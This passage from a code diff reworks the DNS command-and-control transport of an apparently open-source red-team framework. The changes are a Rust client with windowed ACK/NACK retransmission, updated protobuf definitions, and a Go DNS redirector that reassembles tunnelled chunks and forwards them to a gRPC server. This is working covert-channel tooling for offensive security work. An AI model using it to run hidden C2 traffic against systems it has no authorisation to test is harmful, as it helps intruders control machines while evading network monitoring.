Error response + + // Try to parse as STATUS packet (protobuf) + if let Ok(status_packet) = DnsPacket::decode(&response_data[..]) { + if status_packet.r#type == PacketType::Status.into() { + // Process ACKs - mark as acknowledged + for ack_range in &status_packet.acks { + for ack_seq in ack_range.start_seq..=ack_range.end_seq { + acknowledged.insert(ack_seq); + retry_counts.remove(&ack_seq); + } + } + + // Process NACKs - queue for retransmission + for &nack_seq in &status_packet.nacks { + if nack_seq >= 1 && nack_seq <= total_chunks as u32 { + nack_set.insert(nack_seq); + } + } + } + } else if response_data == b"ok" { + // Legacy "ok" response - assume this chunk was accepted + acknowledged.insert(seq_u32); + } else { + // Unknown response format - assume need to retry this chunk + log::debug!("DNS: Unknown response format ({} bytes), retrying chunk", response_data.len()); + nack_set.insert(seq_u32); + } + } + Err(e) => { + // DNS query failed - check if it's a size issue or transient error + let err_msg = e.to_string(); + eprintln!("DNS ERROR: Failed to send chunk {}: {}", seq_u32, err_msg); + + // If packet is too long, this is a fatal error (can't fix with retries) + if err_msg.contains("DNS query too long") { + return Err(anyhow::anyhow!( + "Chunk {} is too large to fit in DNS query: {}", + seq_u32, + err_msg + )); + } + + // Check for connection/network errors + if err_msg.contains("timeout") || err_msg.contains("refused") || err_msg.contains("unreachable") { + eprintln!("DNS ERROR: Connection to DNS server failed."); + } + + // Otherwise, mark for retry (transient network error) + nack_set.insert(seq_u32); + } + } } - // Send END packet - let end_packet = DnsPacket { - r#type: PacketType::End.into(), + // Retry NACKed chunks + while !nack_set.is_empty() { + let nacks_to_retry: Vec = nack_set.drain().collect(); + + for nack_seq in nacks_to_retry { + // Check retry limit + let retries = retry_counts.entry(nack_seq).or_insert(0); + if *retries >= 
MAX_RETRIES_PER_CHUNK { + return Err(anyhow::anyhow!( + "Max retries exceeded for chunk {}", + nack_seq + )); + } + *retries += 1; + + // Skip if already acknowledged (may have been ACKed in another response) + if acknowledged.contains(&nack_seq) { + continue; + } + + if let Some(chunk) = chunks.get((nack_seq - 1) as usize) { + let retransmit_packet = DnsPacket { + r#type: PacketType::Data.into(), + sequence: nack_seq, + conversation_id: conv_id.clone(), + data: chunk.clone(), + crc32: Self::calculate_crc32(chunk), + window_size: SEND_WINDOW_SIZE as u32, + acks: vec![], + nacks: vec![], + }; + + match self.send_packet(retransmit_packet).await { + Ok(response_data) => { + // Parse STATUS response + if let Ok(status_packet) = DnsPacket::decode(&response_data[..]) { + if status_packet.r#type == PacketType::Status.into() { + // Process ACKs + for ack_range in &status_packet.acks { + for ack_seq in ack_range.start_seq..=ack_range.end_seq { + acknowledged.insert(ack_seq); + retry_counts.remove(&ack_seq); + } + } + + // Process NACKs + for &new_nack in &status_packet.nacks { + if new_nack >= 1 && new_nack <= total_chunks as u32 && !acknowledged.contains(&new_nack) { + nack_set.insert(new_nack); + } + } + } + } + } + Err(_) => { + // Retry failed - add back to NACK set + nack_set.insert(nack_seq); + } + } + } + } + } + + // Verify all chunks acknowledged + if acknowledged.len() != total_chunks { + return Err(anyhow::anyhow!( + "Not all chunks acknowledged after max retries: {}/{} chunks. 
Missing: {:?}", + acknowledged.len(), + total_chunks, + (1..=total_chunks as u32).filter(|seq| !acknowledged.contains(seq)).collect::>() + )); + } + + log::debug!("DNS: All {} chunks acknowledged, sending FETCH", total_chunks); + + // All data sent and acknowledged + // Now request the response via FETCH (or END for backward compatibility) + // Send FETCH packet to get response + let fetch_packet = DnsPacket { + r#type: PacketType::Fetch.into(), sequence: (total_chunks + 1) as u32, conversation_id: conv_id.clone(), data: vec![], crc32: 0, + window_size: 0, + acks: vec![], + nacks: vec![], }; - let end_response = self.send_packet(end_packet).await?; + let end_response = match self.send_packet(fetch_packet).await { + Ok(resp) => { + log::debug!("DNS: FETCH response received ({} bytes)", resp.len()); + resp + } + Err(e) => { + return Err(anyhow::anyhow!( + "Failed to fetch response from server: {}.", + e + )); + } + }; - // Check if END response contains ResponseMetadata (chunked response indicator) - // ResponseMetadata is NOT encrypted - it's plain protobuf - // If response is just "ok", it's a small response and will be in first FETCH - // If response is protobuf metadata, we need multiple FETCHes + // Validate response is not empty + if end_response.is_empty() { + return Err(anyhow::anyhow!( + "Server returned empty response." 
+ )); + } + + // Check if response contains ResponseMetadata (chunked response indicator) if end_response.len() > 2 && end_response != b"ok" { // Try to parse as ResponseMetadata (plain protobuf, not encrypted) if let Ok(metadata) = ResponseMetadata::decode(&end_response[..]) { @@ -424,8 +673,8 @@ impl DNS { // Fetch all encrypted response chunks and concatenate let mut full_response = Vec::new(); - for chunk_idx in 0..total_chunks { - // Create FetchPayload with chunk index + for chunk_idx in 1..=total_chunks { + // Create FetchPayload with 1-based chunk index let fetch_payload = FetchPayload { chunk_index: chunk_idx as u32, }; @@ -438,6 +687,9 @@ impl DNS { conversation_id: conv_id.clone(), data: fetch_payload_bytes, crc32: 0, + window_size: 0, + acks: vec![], + nacks: vec![], }; // Each chunk is encrypted - get raw chunk data @@ -461,19 +713,7 @@ impl DNS { } // Single response (small enough to fit in one packet) - // Send FETCH packet to get response - let fetch_packet = DnsPacket { - r#type: PacketType::Fetch.into(), - sequence: (total_chunks + 2) as u32, - conversation_id: conv_id.clone(), - data: vec![], - crc32: 0, - }; - - let final_response = self.send_packet(fetch_packet).await?; - - // Return raw response data - Ok(final_response) + Ok(end_response) } } diff --git a/tavern/internal/c2/dnspb/dns.pb.go b/tavern/internal/c2/dnspb/dns.pb.go index 00ad5e99f..9f319ef7a 100644 --- a/tavern/internal/c2/dnspb/dns.pb.go +++ b/tavern/internal/c2/dnspb/dns.pb.go @@ -28,8 +28,8 @@ const ( PacketType_PACKET_TYPE_UNSPECIFIED PacketType = 0 PacketType_PACKET_TYPE_INIT PacketType = 1 // Establish conversation PacketType_PACKET_TYPE_DATA PacketType = 2 // Send data chunk - PacketType_PACKET_TYPE_END PacketType = 3 // Finalize request - PacketType_PACKET_TYPE_FETCH PacketType = 4 // Retrieve response chunk + PacketType_PACKET_TYPE_FETCH PacketType = 3 // Retrieve response chunk + PacketType_PACKET_TYPE_STATUS PacketType = 4 // Server status response with ACKs/NACKs ) // 
Enum value maps for PacketType. @@ -38,15 +38,15 @@ var ( 0: "PACKET_TYPE_UNSPECIFIED", 1: "PACKET_TYPE_INIT", 2: "PACKET_TYPE_DATA", - 3: "PACKET_TYPE_END", - 4: "PACKET_TYPE_FETCH", + 3: "PACKET_TYPE_FETCH", + 4: "PACKET_TYPE_STATUS", } PacketType_value = map[string]int32{ "PACKET_TYPE_UNSPECIFIED": 0, "PACKET_TYPE_INIT": 1, "PACKET_TYPE_DATA": 2, - "PACKET_TYPE_END": 3, - "PACKET_TYPE_FETCH": 4, + "PACKET_TYPE_FETCH": 3, + "PACKET_TYPE_STATUS": 4, } ) @@ -86,8 +86,12 @@ type DNSPacket struct { ConversationId string `protobuf:"bytes,3,opt,name=conversation_id,json=conversationId,proto3" json:"conversation_id,omitempty"` // 12-character random conversation ID Data []byte `protobuf:"bytes,4,opt,name=data,proto3" json:"data,omitempty"` // Chunk payload (or InitPayload for INIT packets) Crc32 uint32 `protobuf:"varint,5,opt,name=crc32,proto3" json:"crc32,omitempty"` // Optional CRC32 for validation - unknownFields protoimpl.UnknownFields - sizeCache protoimpl.SizeCache + // Async protocol fields for windowed transmission + WindowSize uint32 `protobuf:"varint,6,opt,name=window_size,json=windowSize,proto3" json:"window_size,omitempty"` // Number of packets client has in-flight + Acks []*AckRange `protobuf:"bytes,7,rep,name=acks,proto3" json:"acks,omitempty"` // Ranges of successfully received chunks (SACK) + Nacks []uint32 `protobuf:"varint,8,rep,packed,name=nacks,proto3" json:"nacks,omitempty"` // Specific sequence numbers to retransmit + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache } func (x *DNSPacket) Reset() { @@ -155,6 +159,80 @@ func (x *DNSPacket) GetCrc32() uint32 { return 0 } +func (x *DNSPacket) GetWindowSize() uint32 { + if x != nil { + return x.WindowSize + } + return 0 +} + +func (x *DNSPacket) GetAcks() []*AckRange { + if x != nil { + return x.Acks + } + return nil +} + +func (x *DNSPacket) GetNacks() []uint32 { + if x != nil { + return x.Nacks + } + return nil +} + +// AckRange represents a contiguous range of acknowledged 
sequence numbers +type AckRange struct { + state protoimpl.MessageState `protogen:"open.v1"` + StartSeq uint32 `protobuf:"varint,1,opt,name=start_seq,json=startSeq,proto3" json:"start_seq,omitempty"` // Inclusive start of range + EndSeq uint32 `protobuf:"varint,2,opt,name=end_seq,json=endSeq,proto3" json:"end_seq,omitempty"` // Inclusive end of range + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache +} + +func (x *AckRange) Reset() { + *x = AckRange{} + mi := &file_dns_proto_msgTypes[1] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) +} + +func (x *AckRange) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*AckRange) ProtoMessage() {} + +func (x *AckRange) ProtoReflect() protoreflect.Message { + mi := &file_dns_proto_msgTypes[1] + if x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use AckRange.ProtoReflect.Descriptor instead. 
+func (*AckRange) Descriptor() ([]byte, []int) { + return file_dns_proto_rawDescGZIP(), []int{1} +} + +func (x *AckRange) GetStartSeq() uint32 { + if x != nil { + return x.StartSeq + } + return 0 +} + +func (x *AckRange) GetEndSeq() uint32 { + if x != nil { + return x.EndSeq + } + return 0 +} + // InitPayload is the payload for INIT packets // It contains metadata about the upcoming data transmission type InitPayload struct { @@ -162,13 +240,14 @@ type InitPayload struct { MethodCode string `protobuf:"bytes,1,opt,name=method_code,json=methodCode,proto3" json:"method_code,omitempty"` // 2-character gRPC method code (e.g., "ct", "fa") TotalChunks uint32 `protobuf:"varint,2,opt,name=total_chunks,json=totalChunks,proto3" json:"total_chunks,omitempty"` // Total number of data chunks to expect DataCrc32 uint32 `protobuf:"varint,3,opt,name=data_crc32,json=dataCrc32,proto3" json:"data_crc32,omitempty"` // CRC32 checksum of complete request data + FileSize uint32 `protobuf:"varint,4,opt,name=file_size,json=fileSize,proto3" json:"file_size,omitempty"` // Total size of the file/data in bytes unknownFields protoimpl.UnknownFields sizeCache protoimpl.SizeCache } func (x *InitPayload) Reset() { *x = InitPayload{} - mi := &file_dns_proto_msgTypes[1] + mi := &file_dns_proto_msgTypes[2] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -180,7 +259,7 @@ func (x *InitPayload) String() string { func (*InitPayload) ProtoMessage() {} func (x *InitPayload) ProtoReflect() protoreflect.Message { - mi := &file_dns_proto_msgTypes[1] + mi := &file_dns_proto_msgTypes[2] if x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -193,7 +272,7 @@ func (x *InitPayload) ProtoReflect() protoreflect.Message { // Deprecated: Use InitPayload.ProtoReflect.Descriptor instead. 
func (*InitPayload) Descriptor() ([]byte, []int) { - return file_dns_proto_rawDescGZIP(), []int{1} + return file_dns_proto_rawDescGZIP(), []int{2} } func (x *InitPayload) GetMethodCode() string { @@ -217,6 +296,13 @@ func (x *InitPayload) GetDataCrc32() uint32 { return 0 } +func (x *InitPayload) GetFileSize() uint32 { + if x != nil { + return x.FileSize + } + return 0 +} + // FetchPayload is the payload for FETCH packets // It specifies which response chunk to retrieve type FetchPayload struct { @@ -228,7 +314,7 @@ type FetchPayload struct { func (x *FetchPayload) Reset() { *x = FetchPayload{} - mi := &file_dns_proto_msgTypes[2] + mi := &file_dns_proto_msgTypes[3] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -240,7 +326,7 @@ func (x *FetchPayload) String() string { func (*FetchPayload) ProtoMessage() {} func (x *FetchPayload) ProtoReflect() protoreflect.Message { - mi := &file_dns_proto_msgTypes[2] + mi := &file_dns_proto_msgTypes[3] if x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -253,7 +339,7 @@ func (x *FetchPayload) ProtoReflect() protoreflect.Message { // Deprecated: Use FetchPayload.ProtoReflect.Descriptor instead. 
func (*FetchPayload) Descriptor() ([]byte, []int) { - return file_dns_proto_rawDescGZIP(), []int{2} + return file_dns_proto_rawDescGZIP(), []int{3} } func (x *FetchPayload) GetChunkIndex() uint32 { @@ -275,7 +361,7 @@ type ResponseMetadata struct { func (x *ResponseMetadata) Reset() { *x = ResponseMetadata{} - mi := &file_dns_proto_msgTypes[3] + mi := &file_dns_proto_msgTypes[4] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -287,7 +373,7 @@ func (x *ResponseMetadata) String() string { func (*ResponseMetadata) ProtoMessage() {} func (x *ResponseMetadata) ProtoReflect() protoreflect.Message { - mi := &file_dns_proto_msgTypes[3] + mi := &file_dns_proto_msgTypes[4] if x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -300,7 +386,7 @@ func (x *ResponseMetadata) ProtoReflect() protoreflect.Message { // Deprecated: Use ResponseMetadata.ProtoReflect.Descriptor instead. func (*ResponseMetadata) Descriptor() ([]byte, []int) { - return file_dns_proto_rawDescGZIP(), []int{3} + return file_dns_proto_rawDescGZIP(), []int{4} } func (x *ResponseMetadata) GetTotalChunks() uint32 { @@ -328,19 +414,27 @@ var File_dns_proto protoreflect.FileDescriptor const file_dns_proto_rawDesc = "" + "\n" + - "\tdns.proto\x12\x03dns\"\x9f\x01\n" + + "\tdns.proto\x12\x03dns\"\xf9\x01\n" + "\tDNSPacket\x12#\n" + "\x04type\x18\x01 \x01(\x0e2\x0f.dns.PacketTypeR\x04type\x12\x1a\n" + "\bsequence\x18\x02 \x01(\rR\bsequence\x12'\n" + "\x0fconversation_id\x18\x03 \x01(\tR\x0econversationId\x12\x12\n" + "\x04data\x18\x04 \x01(\fR\x04data\x12\x14\n" + - "\x05crc32\x18\x05 \x01(\rR\x05crc32\"p\n" + + "\x05crc32\x18\x05 \x01(\rR\x05crc32\x12\x1f\n" + + "\vwindow_size\x18\x06 \x01(\rR\n" + + "windowSize\x12!\n" + + "\x04acks\x18\a \x03(\v2\r.dns.AckRangeR\x04acks\x12\x14\n" + + "\x05nacks\x18\b \x03(\rR\x05nacks\"@\n" + + "\bAckRange\x12\x1b\n" + + "\tstart_seq\x18\x01 \x01(\rR\bstartSeq\x12\x17\n" + + "\aend_seq\x18\x02 
\x01(\rR\x06endSeq\"\x8d\x01\n" + "\vInitPayload\x12\x1f\n" + "\vmethod_code\x18\x01 \x01(\tR\n" + "methodCode\x12!\n" + "\ftotal_chunks\x18\x02 \x01(\rR\vtotalChunks\x12\x1d\n" + "\n" + - "data_crc32\x18\x03 \x01(\rR\tdataCrc32\"/\n" + + "data_crc32\x18\x03 \x01(\rR\tdataCrc32\x12\x1b\n" + + "\tfile_size\x18\x04 \x01(\rR\bfileSize\"/\n" + "\fFetchPayload\x12\x1f\n" + "\vchunk_index\x18\x01 \x01(\rR\n" + "chunkIndex\"s\n" + @@ -349,14 +443,14 @@ const file_dns_proto_rawDesc = "" + "\n" + "data_crc32\x18\x02 \x01(\rR\tdataCrc32\x12\x1d\n" + "\n" + - "chunk_size\x18\x03 \x01(\rR\tchunkSize*\x81\x01\n" + + "chunk_size\x18\x03 \x01(\rR\tchunkSize*\x84\x01\n" + "\n" + "PacketType\x12\x1b\n" + "\x17PACKET_TYPE_UNSPECIFIED\x10\x00\x12\x14\n" + "\x10PACKET_TYPE_INIT\x10\x01\x12\x14\n" + - "\x10PACKET_TYPE_DATA\x10\x02\x12\x13\n" + - "\x0fPACKET_TYPE_END\x10\x03\x12\x15\n" + - "\x11PACKET_TYPE_FETCH\x10\x04B$Z\"realm.pub/tavern/internal/c2/dnspbb\x06proto3" + "\x10PACKET_TYPE_DATA\x10\x02\x12\x15\n" + + "\x11PACKET_TYPE_FETCH\x10\x03\x12\x16\n" + + "\x12PACKET_TYPE_STATUS\x10\x04B$Z\"realm.pub/tavern/internal/c2/dnspbb\x06proto3" var ( file_dns_proto_rawDescOnce sync.Once @@ -371,21 +465,23 @@ func file_dns_proto_rawDescGZIP() []byte { } var file_dns_proto_enumTypes = make([]protoimpl.EnumInfo, 1) -var file_dns_proto_msgTypes = make([]protoimpl.MessageInfo, 4) +var file_dns_proto_msgTypes = make([]protoimpl.MessageInfo, 5) var file_dns_proto_goTypes = []any{ (PacketType)(0), // 0: dns.PacketType (*DNSPacket)(nil), // 1: dns.DNSPacket - (*InitPayload)(nil), // 2: dns.InitPayload - (*FetchPayload)(nil), // 3: dns.FetchPayload - (*ResponseMetadata)(nil), // 4: dns.ResponseMetadata + (*AckRange)(nil), // 2: dns.AckRange + (*InitPayload)(nil), // 3: dns.InitPayload + (*FetchPayload)(nil), // 4: dns.FetchPayload + (*ResponseMetadata)(nil), // 5: dns.ResponseMetadata } var file_dns_proto_depIdxs = []int32{ 0, // 0: dns.DNSPacket.type:type_name -> dns.PacketType - 1, // [1:1] is 
the sub-list for method output_type - 1, // [1:1] is the sub-list for method input_type - 1, // [1:1] is the sub-list for extension type_name - 1, // [1:1] is the sub-list for extension extendee - 0, // [0:1] is the sub-list for field type_name + 2, // 1: dns.DNSPacket.acks:type_name -> dns.AckRange + 2, // [2:2] is the sub-list for method output_type + 2, // [2:2] is the sub-list for method input_type + 2, // [2:2] is the sub-list for extension type_name + 2, // [2:2] is the sub-list for extension extendee + 0, // [0:2] is the sub-list for field type_name } func init() { file_dns_proto_init() } @@ -399,7 +495,7 @@ func file_dns_proto_init() { GoPackagePath: reflect.TypeOf(x{}).PkgPath(), RawDescriptor: unsafe.Slice(unsafe.StringData(file_dns_proto_rawDesc), len(file_dns_proto_rawDesc)), NumEnums: 1, - NumMessages: 4, + NumMessages: 5, NumExtensions: 0, NumServices: 0, }, diff --git a/tavern/internal/c2/proto/dns.proto b/tavern/internal/c2/proto/dns.proto index 1c9d4d2d9..6fc76d8aa 100644 --- a/tavern/internal/c2/proto/dns.proto +++ b/tavern/internal/c2/proto/dns.proto @@ -9,8 +9,8 @@ enum PacketType { PACKET_TYPE_UNSPECIFIED = 0; PACKET_TYPE_INIT = 1; // Establish conversation PACKET_TYPE_DATA = 2; // Send data chunk - PACKET_TYPE_END = 3; // Finalize request - PACKET_TYPE_FETCH = 4; // Retrieve response chunk + PACKET_TYPE_FETCH = 3; // Retrieve response chunk + PACKET_TYPE_STATUS = 4; // Server status response with ACKs/NACKs } // DNSPacket is the main message format for DNS C2 communication @@ -21,6 +21,17 @@ message DNSPacket { string conversation_id = 3; // 12-character random conversation ID bytes data = 4; // Chunk payload (or InitPayload for INIT packets) uint32 crc32 = 5; // Optional CRC32 for validation + + // Async protocol fields for windowed transmission + uint32 window_size = 6; // Number of packets client has in-flight + repeated AckRange acks = 7; // Ranges of successfully received chunks (SACK) + repeated uint32 nacks = 8; // Specific sequence 
numbers to retransmit +} + +// AckRange represents a contiguous range of acknowledged sequence numbers +message AckRange { + uint32 start_seq = 1; // Inclusive start of range + uint32 end_seq = 2; // Inclusive end of range } // InitPayload is the payload for INIT packets @@ -29,6 +40,7 @@ message InitPayload { string method_code = 1; // 2-character gRPC method code (e.g., "ct", "fa") uint32 total_chunks = 2; // Total number of data chunks to expect uint32 data_crc32 = 3; // CRC32 checksum of complete request data + uint32 file_size = 4; // Total size of the file/data in bytes } // FetchPayload is the payload for FETCH packets diff --git a/tavern/internal/redirectors/dns/dns.go b/tavern/internal/redirectors/dns/dns.go index ecd60ac07..7ea2b20e3 100644 --- a/tavern/internal/redirectors/dns/dns.go +++ b/tavern/internal/redirectors/dns/dns.go @@ -4,13 +4,17 @@ import ( "context" "encoding/base32" "encoding/binary" + "errors" "fmt" "hash/crc32" + "io" "log/slog" "net" "net/url" + "sort" "strings" "sync" + "sync/atomic" "time" "google.golang.org/grpc" @@ -39,6 +43,15 @@ const ( dnsPointer = 0xC00C txtMaxChunkSize = 255 + + // Async protocol configuration + MaxActiveConversations = 10000 + NormalConversationTimeout = 15 * time.Minute + ReducedConversationTimeout = 5 * time.Minute + CapacityRecoveryThreshold = 0.5 // 50% + MaxAckRangesInResponse = 20 + MaxNacksInResponse = 50 + MaxDataSize = 50 * 1024 * 1024 // 50MB max data size ) func init() { @@ -47,23 +60,26 @@ func init() { // Redirector handles DNS-based C2 communication type Redirector struct { - conversations sync.Map - baseDomains []string + conversations sync.Map + baseDomains []string + conversationCount int32 // Atomic counter for active conversations + conversationTimeout time.Duration } // Conversation tracks state for a request-response exchange type Conversation struct { - mu sync.Mutex - ID string - MethodPath string - TotalChunks uint32 - ExpectedCRC uint32 - Chunks map[uint32][]byte - LastActivity 
time.Time - ResponseData []byte - ResponseChunks [][]byte // Split response for multi-fetch - ResponseCRC uint32 - MaxResponseSize int // Max size per DNS response packet + mu sync.Mutex + ID string + MethodPath string + TotalChunks uint32 + ExpectedCRC uint32 + ExpectedDataSize uint32 // Data size provided by client + Chunks map[uint32][]byte + LastActivity time.Time + ResponseData []byte + ResponseChunks [][]byte // Split response for multi-fetch + ResponseCRC uint32 + Completed bool // Set to true when all chunks received } func (r *Redirector) Redirect(ctx context.Context, listenOn string, upstream *grpc.ClientConn) error { @@ -77,6 +93,7 @@ func (r *Redirector) Redirect(ctx context.Context, listenOn string, upstream *gr } r.baseDomains = domains + r.conversationTimeout = NormalConversationTimeout udpAddr, err := net.ResolveUDPAddr("udp", listenAddr) if err != nil { @@ -162,11 +179,21 @@ func (r *Redirector) cleanupConversations(ctx context.Context) { return case <-ticker.C: now := time.Now() + count := atomic.LoadInt32(&r.conversationCount) + + // Adjust timeout based on capacity + if count >= MaxActiveConversations { + r.conversationTimeout = ReducedConversationTimeout + } else if float64(count) < float64(MaxActiveConversations)*CapacityRecoveryThreshold { + r.conversationTimeout = NormalConversationTimeout + } + r.conversations.Range(func(key, value interface{}) bool { conv := value.(*Conversation) conv.mu.Lock() - if now.Sub(conv.LastActivity) > convTimeout { + if now.Sub(conv.LastActivity) > r.conversationTimeout { r.conversations.Delete(key) + atomic.AddInt32(&r.conversationCount, -1) } conv.mu.Unlock() return true @@ -216,9 +243,7 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr case dnspb.PacketType_PACKET_TYPE_INIT: responseData, err = r.handleInitPacket(packet) case dnspb.PacketType_PACKET_TYPE_DATA: - responseData, err = r.handleDataPacket(packet) - case dnspb.PacketType_PACKET_TYPE_END: - responseData, err = 
r.handleEndPacket(ctx, upstream, packet, queryType) + responseData, err = r.handleDataPacket(ctx, upstream, packet, queryType) case dnspb.PacketType_PACKET_TYPE_FETCH: responseData, err = r.handleFetchPacket(packet) default: @@ -295,20 +320,53 @@ func (r *Redirector) decodePacket(subdomain string) (*dnspb.DNSPacket, error) { // handleInitPacket processes INIT packet func (r *Redirector) handleInitPacket(packet *dnspb.DNSPacket) ([]byte, error) { + // Atomically check and increment conversation count + // Loop until we successfully increment or hit the limit + for { + current := atomic.LoadInt32(&r.conversationCount) + if current >= MaxActiveConversations { + return nil, fmt.Errorf("max active conversations reached: %d", current) + } + // Try to increment atomically + if atomic.CompareAndSwapInt32(&r.conversationCount, current, current+1) { + // Successfully incremented, break out + break + } + // CAS failed (another goroutine modified the value), retry + } + // Unmarshal init payload var initPayload dnspb.InitPayload if err := proto.Unmarshal(packet.Data, &initPayload); err != nil { + // Decrement on error since we already incremented + atomic.AddInt32(&r.conversationCount, -1) return nil, fmt.Errorf("failed to unmarshal init payload: %w", err) } + // Validate file size from client + if initPayload.FileSize > MaxDataSize { + atomic.AddInt32(&r.conversationCount, -1) + return nil, fmt.Errorf("data size exceeds maximum: %d > %d bytes", initPayload.FileSize, MaxDataSize) + } + + // Validate that FileSize is set (protobuf default is 0) + if initPayload.FileSize == 0 && initPayload.TotalChunks > 0 { + slog.Warn("INIT packet missing file_size field", "conv_id", packet.ConversationId, "total_chunks", initPayload.TotalChunks) + } + + slog.Debug("creating conversation", "conv_id", packet.ConversationId, "method", initPayload.MethodCode, + "total_chunks", initPayload.TotalChunks, "file_size", initPayload.FileSize, "crc32", initPayload.DataCrc32) + // Create conversation conv 
:= &Conversation{ - ID: packet.ConversationId, - MethodPath: initPayload.MethodCode, - TotalChunks: initPayload.TotalChunks, - ExpectedCRC: initPayload.DataCrc32, - Chunks: make(map[uint32][]byte), - LastActivity: time.Now(), + ID: packet.ConversationId, + MethodPath: initPayload.MethodCode, + TotalChunks: initPayload.TotalChunks, + ExpectedCRC: initPayload.DataCrc32, + ExpectedDataSize: initPayload.FileSize, + Chunks: make(map[uint32][]byte), + LastActivity: time.Now(), + Completed: false, } r.conversations.Store(packet.ConversationId, conv) @@ -319,7 +377,7 @@ func (r *Redirector) handleInitPacket(packet *dnspb.DNSPacket) ([]byte, error) { } // handleDataPacket processes DATA packet -func (r *Redirector) handleDataPacket(packet *dnspb.DNSPacket) ([]byte, error) { +func (r *Redirector) handleDataPacket(ctx context.Context, upstream *grpc.ClientConn, packet *dnspb.DNSPacket, queryType uint16) ([]byte, error) { val, ok := r.conversations.Load(packet.ConversationId) if !ok { return nil, fmt.Errorf("conversation not found: %s", packet.ConversationId) @@ -329,37 +387,60 @@ func (r *Redirector) handleDataPacket(packet *dnspb.DNSPacket) ([]byte, error) { conv.mu.Lock() defer conv.mu.Unlock() - // Store chunk (sequence is 1-indexed) + // Validate sequence number + if packet.Sequence < 1 || packet.Sequence > conv.TotalChunks { + return nil, fmt.Errorf("sequence out of bounds: %d (expected 1-%d)", packet.Sequence, conv.TotalChunks) + } + + // Store chunk (sequence is 1-indexed, overwrites duplicates safely) conv.Chunks[packet.Sequence] = packet.Data conv.LastActivity = time.Now() slog.Debug("received chunk", "conv_id", conv.ID, "seq", packet.Sequence, "size", len(packet.Data), "total", len(conv.Chunks)) - return []byte("ok"), nil -} + // Check if conversation is complete and auto-process + if uint32(len(conv.Chunks)) == conv.TotalChunks && !conv.Completed { + conv.Completed = true + slog.Debug("conversation complete, processing request", "conv_id", conv.ID, "total_chunks", 
conv.TotalChunks) -// handleEndPacket processes END packet and forwards to upstream -func (r *Redirector) handleEndPacket(ctx context.Context, upstream *grpc.ClientConn, packet *dnspb.DNSPacket, queryType uint16) ([]byte, error) { - val, ok := r.conversations.Load(packet.ConversationId) - if !ok { - return nil, fmt.Errorf("conversation not found: %s", packet.ConversationId) + // Unlock before calling processCompletedConversation (it will re-lock) + conv.mu.Unlock() + if err := r.processCompletedConversation(ctx, upstream, conv, queryType); err != nil { + slog.Error("failed to process completed conversation", "conv_id", conv.ID, "error", err) + } + conv.mu.Lock() } - conv := val.(*Conversation) - conv.mu.Lock() - defer conv.mu.Unlock() + // Build ACK/NACK response (STATUS packet) + acks, nacks := r.computeAcksNacks(conv) - // Check if all chunks received - if uint32(len(conv.Chunks)) != conv.TotalChunks { - return nil, fmt.Errorf("missing chunks: received %d, expected %d", len(conv.Chunks), conv.TotalChunks) + statusPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_STATUS, + ConversationId: packet.ConversationId, + Acks: acks, + Nacks: nacks, } + // Marshal STATUS packet to return as response + statusData, err := proto.Marshal(statusPacket) + if err != nil { + return nil, fmt.Errorf("failed to marshal status packet: %w", err) + } + + return statusData, nil +} + +// processCompletedConversation reassembles data, verifies CRC, forwards to upstream, and stores response +func (r *Redirector) processCompletedConversation(ctx context.Context, upstream *grpc.ClientConn, conv *Conversation, queryType uint16) error { + conv.mu.Lock() + defer conv.mu.Unlock() + // Reassemble data (chunks are 1-indexed) var fullData []byte for i := uint32(1); i <= conv.TotalChunks; i++ { chunk, ok := conv.Chunks[i] if !ok { - return nil, fmt.Errorf("missing chunk %d", i) + return fmt.Errorf("missing chunk %d", i) } fullData = append(fullData, chunk...) 
} @@ -367,28 +448,40 @@ func (r *Redirector) handleEndPacket(ctx context.Context, upstream *grpc.ClientC // Verify CRC actualCRC := crc32.ChecksumIEEE(fullData) if actualCRC != conv.ExpectedCRC { - return nil, fmt.Errorf("data CRC mismatch: expected %d, got %d", conv.ExpectedCRC, actualCRC) + // Clean up on fatal error + r.conversations.Delete(conv.ID) + atomic.AddInt32(&r.conversationCount, -1) + return fmt.Errorf("data CRC mismatch: expected %d, got %d", conv.ExpectedCRC, actualCRC) } slog.Debug("reassembled data", "conv_id", conv.ID, "size", len(fullData), "method", conv.MethodPath) + // Validate reassembled size matches client-provided data size (if provided) + if conv.ExpectedDataSize > 0 && uint32(len(fullData)) != conv.ExpectedDataSize { + // Clean up on fatal error + r.conversations.Delete(conv.ID) + atomic.AddInt32(&r.conversationCount, -1) + return fmt.Errorf("reassembled data size mismatch: expected %d bytes, got %d bytes", conv.ExpectedDataSize, len(fullData)) + } + // Forward to upstream gRPC server responseData, err := r.forwardToUpstream(ctx, upstream, conv.MethodPath, fullData) if err != nil { - return nil, fmt.Errorf("failed to forward to upstream: %w", err) + // Clean up on fatal error + r.conversations.Delete(conv.ID) + atomic.AddInt32(&r.conversationCount, -1) + return fmt.Errorf("failed to forward to upstream: %w", err) } - // Determine max response size based on record type to fit in UDP packet - // For A/AAAA records with multiple records, we need much smaller chunks - // to avoid creating packets with 100+ DNS records + // Determine max response size based on record type var maxSize int switch queryType { case txtRecordType: - maxSize = 400 // TXT can handle larger chunks in single record + maxSize = 400 case aRecordType: - maxSize = 64 // A records: 64 bytes = 16 A records (16 * 4 bytes) + maxSize = 64 case aaaaRecordType: - maxSize = 128 // AAAA records: 128 bytes = 8 AAAA records (8 * 16 bytes) + 